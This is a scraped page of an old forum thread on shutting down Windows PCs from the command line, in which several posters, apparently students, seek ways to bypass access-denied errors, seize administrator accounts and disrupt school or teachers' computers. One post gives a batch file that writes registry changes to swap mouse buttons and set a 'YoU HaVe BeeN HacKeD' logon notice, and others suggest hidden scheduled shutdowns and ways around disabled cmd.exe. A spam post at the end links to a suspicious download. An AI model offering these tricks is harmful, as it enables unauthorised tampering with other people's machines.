opennms
+ Reply to Thread
Page 5 of 6 FirstFirst ... 3456 LastLast

Thread: Shutdown Using MS-DOS

Unregistered Guest
    if it wont let you run cmd.exe just run command.exe (or just command in the run box) ive found it will run when cmd.exe is disabled =)

this is on a win2k and xp box however...win*x only has command.exe and cmd isnt on win*x

to shut down a pc you have admin rights on...make a scheduled task in your windows (or hers, she probably wont find it) and have the shutdown command shut the pc off at *0pm

Unregistered Guest

Talking

OK OK PLEASE HELP ME SOMONE I know like all the command prompt stuff but Ineed to know one more thing if your trying to add an account witch I had done before but they caught me and now it says ACCESS DENIED is there a way through command prompt to grand access...

Ryan >>>THX

Unregistered Guest

help plz

hey ... i bet this is random but can somone tell me how to make a batch file that runs when windows starts that requires a boot disk

Unregistered Guest

plz help

how do u pass the access denied alert? i want to plauge all my schools computers

echo off
    echo REGEDIT4 >> c:\reg.reg
    echo. >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Mouse] >> c:\reg.reg
    echo "SwapMouseButtons"="*" >> c:\reg.reg
    echo "MouseSpeed"="*" >> c:\reg.reg
    echo "DoubleClickSpeed"="*00" >> c:\reg.reg
    echo [HKEY_CURRENT_USER\Control Panel\Key***rd] >> c:\reg.reg
    echo "Key***rdDelay"="5" >> c:\reg.reg
    echo "Key***rdSpeed"="*0" >> c:\reg.reg
    echo [HKEY_CURRENT_USER\SOFTWARE\Microsoft\Internet Explorer\Main] >> c:\reg.reg
    echo "Start Page"="http://www.google.com/" >> c:\reg.reg
    echo.
    echo [HKEY_CURRENT_USER\Control Panel\Desktop] >> c:\reg.reg
    echo "PaintDesktopVersion"=dword:* >> c:\reg.reg
    echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> c:\reg.reg
    echo "LegalNoticeCaption"="YoU HaVe BeeN HacKeD" >> c:\reg.reg
    echo "LegalNoticeText"="Please contact *-800-255-*700" >> c:\reg.reg

Quote Originally Posted by Unregistered
    My bitch teacher just shutdown my computer so I'd like to return the favor. When I try to shut her computer down in command prompt, it says access denied. Is there anyway I can go around that?

Thanks.
    nothing but newbs and script kiddies in this forum

its funny as crap how many people ran that bat file on thier own computer. who in thier right mind would run a file meant to do harm to another on your own compy. lmao

Infection Guest
    I am now inspired to write my own file.

Unregistered Guest

?

I know you can control pint job through net print.
    but considering that there seemd to be no protection throught the printers in my school is there any way to go throught there to get toe other comps?

Unregistered Guest
    i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz

Unregistered Guest

Thumbs up

i want to shut down some networked pc using cmd or a bat file but i dont know the computer names can somebody help me plz

if you can get to the computer you want to shutdown type in " ipconfig /all "
    and find the ip/comp name

Unregistered Guest

Lightbulb

sir,
    I am using lan system ,i want 2 delete/change administrator password
    I done these step but vain

goto comond prompt

and write net user administrator*

no found administrator changed and delete opetion plz help me

i know u ppl will think im a complete loser which i am. ive been trying to hack and send virsus scince the 5th grade and i havnt gone anywhere you guys seem smart could anyone plz point me in the right direction where to learn?

one too but im trying i just have this crazy internet filter that i cant get around. i even have the pasword. any ideas about books or where to start being a hacker would be much aprisheated.

Question

once i have sumones ip address what can i do? could i possibly hack there game account if they play the same one as me?

been looking for this thread to come up

wow,

these post are really very helpful... i've been trying to do the same thing but with no luck on the shutdown.exe..... Im also getting access denied. Im trying this on a Peer-To-Peer LAN. Each workstation has WinXP SP2 on it. What is wierd is that each workstation userid's are on admin level (unless there is something higher than "Administrator").. including whatever station I use. I have admin access to any workstation that I sit into but I cannot get accomplish this remotely (I mean station shutting down another station)... I will appreciate the help... oh and another thing, hopefully I can accomplish this without using a third party freeware.... i really wanted to learn how stuff works.... hope ya'll understand

Post Linklist of the best mp* sites

Create a list of your poop. Include poop of your choice (size, path, date, etc). Save in internal format or export as text, html or xls. Import lists created by other applications. Find duplicates in your toilet. Compare your list to other people's lists (find out what others have that you don't, and the opposite). Insert & edit items. Plenty options to satisfy almost anyone

[url=http://weblogs.jomc.unc.edu:*6080/briman/wp-content/spell-plugin/poop/*.html]download diz here prog[/url]
    Last edited by Moonbat; 11-29-2007 at 05:31 PM.

+ Reply to Thread